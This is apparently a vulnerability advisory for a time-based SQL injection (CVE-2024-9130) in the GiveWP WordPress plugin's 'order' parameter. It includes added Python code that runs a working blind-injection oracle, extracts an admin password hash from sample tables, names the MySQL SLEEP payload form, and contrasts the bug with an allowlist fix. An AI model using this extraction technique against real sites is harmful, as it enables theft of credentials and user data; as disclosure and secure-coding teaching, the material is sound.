SQL Injection Vulnerability in GiveWP's Donation Plugin
CVE-2024-9130
7.2 HIGH
Key Information:
- Vendor: Webdevmattcrom
- Product: GiveWP – Donation Plugin And Fundraising Platform
- CVE Published: 27 September 2024
Summary
The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to time-based SQL injection via the 'order' parameter in all versions up to and including 3.16.1. The user-supplied value is not escaped and the existing SQL query is not prepared, so authenticated users with Manager-level access or above can append additional SQL to the existing query and use it to extract sensitive information from the database. The injection is reachable in Legacy View mode. A successful attack exposes the contents of the site database, including user data, and undermines the integrity of the application.
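The following is an added example, not GiveWP's code and not part of the original advisory. It reproduces the bug class the summary describes: a sort direction taken from the request and concatenated into the query text, beside the hardened form. It also shows why escaping is the wrong fix here: an ORDER BY direction is SQL syntax, not a data value, so it cannot be bound as a prepared-statement parameter and must be checked against a fixed allowlist instead. The table names, the rows and the placeholder password hash are constructed for the demonstration; the parameter name 'order' is the one the advisory names. Because SQLite has no SLEEP(), the blind oracle below uses the sort order as its side channel; on MySQL the same injection point takes an IF(cond, SLEEP(n), 0) expression, which is the time-based variant the advisory reports.

```python
import sqlite3

# Constructed sample data for the demonstration; none of it comes from GiveWP
# or from a real site. The password hash is a made-up placeholder string.
SAMPLE_DONATIONS = [("alice", 10.0), ("bob", 25.0), ("carol", 40.0)]
SAMPLE_ADMIN_HASH = "$P$BnotArealHashValue"


def make_db():
    """Build an in-memory SQLite database with a donations table and a
    WordPress-style users table (constructed fixtures, not GiveWP's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE donations (id INTEGER PRIMARY KEY, donor TEXT, amount REAL)")
    conn.executemany("INSERT INTO donations (donor, amount) VALUES (?, ?)", SAMPLE_DONATIONS)
    conn.execute("CREATE TABLE wp_users (user_login TEXT, user_pass TEXT)")
    conn.execute("INSERT INTO wp_users VALUES (?, ?)", ("admin", SAMPLE_ADMIN_HASH))
    return conn


def list_donations_vulnerable(conn, order):
    """Bug class described in the advisory: the 'order' value is concatenated
    into the query text. Binding it as a parameter would not help either, because
    an ORDER BY direction is SQL syntax, not a data value."""
    sql = f"SELECT donor, amount FROM donations ORDER BY amount {order}"
    return conn.execute(sql).fetchall()


ALLOWED_ORDER = ("ASC", "DESC")


def is_safe_order(order):
    """Allowlist check: only the two literal directions are accepted."""
    return order.strip().upper() in ALLOWED_ORDER


def list_donations_hardened(conn, order):
    """Hardened form: reject anything that is not exactly ASC or DESC before it
    reaches the query text."""
    if not is_safe_order(order):
        raise ValueError(f"rejected order value: {order!r}")
    sql = f"SELECT donor, amount FROM donations ORDER BY amount {order.strip().upper()}"
    return conn.execute(sql).fetchall()


def oracle(conn, condition):
    """One bit of inference per request. The injected CASE flips the sort
    direction when `condition` is true, so the first row reveals the answer.
    In MySQL the same injection point accepts IF(cond, SLEEP(n), 0), which is
    the time-based variant the advisory describes; SQLite has no SLEEP, so the
    sort order is used as the side channel here instead."""
    payload = f"* (CASE WHEN ({condition}) THEN -1 ELSE 1 END)"
    rows = list_donations_vulnerable(conn, payload)
    return rows[0][1] == max(amount for _, amount in SAMPLE_DONATIONS)


def extract_hash_prefix(conn, length):
    """Recover the first `length` characters of the admin password hash with a
    binary search over ASCII code points, seven oracle queries per character."""
    recovered = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = (
                f"(SELECT unicode(substr(user_pass, {pos}, 1)) FROM wp_users "
                f"WHERE user_login = 'admin') > {mid}"
            )
            if oracle(conn, cond):
                lo = mid + 1
            else:
                hi = mid
        recovered.append(chr(lo))
    return "".join(recovered)


if __name__ == "__main__":
    db = make_db()
    print("leaked via vulnerable ORDER BY:", extract_hash_prefix(db, 4))
    try:
        list_donations_hardened(db, "* (CASE WHEN 1 THEN -1 ELSE 1 END)")
    except ValueError as exc:
        print("hardened query:", exc)
```

The oracle needs only Manager-level access to the listing endpoint, which matches the advisory's "Privileges Required: High" rating: the attacker is already a trusted user, and the injection turns that listing permission into read access to every table the database user can see. When reviewing plugin code for the same pattern, look for any request value that lands in ORDER BY, GROUP BY, LIMIT or a column name; those positions need an allowlist, not escaping.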
Affected Version(s)
GiveWP – Donation Plugin and Fundraising Platform <= 3.16.1
CVSS V3.1
Score: 7.2
Severity: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Confidentiality: High
Integrity: High
Availability: High
Attack Vector: Network
Attack Complexity: Low
Privileges Required: High
User Interaction: None
Scope: Unchanged
Timeline
Vulnerability published: 27 September 2024
Vulnerability reserved
Credit
Leo Trinh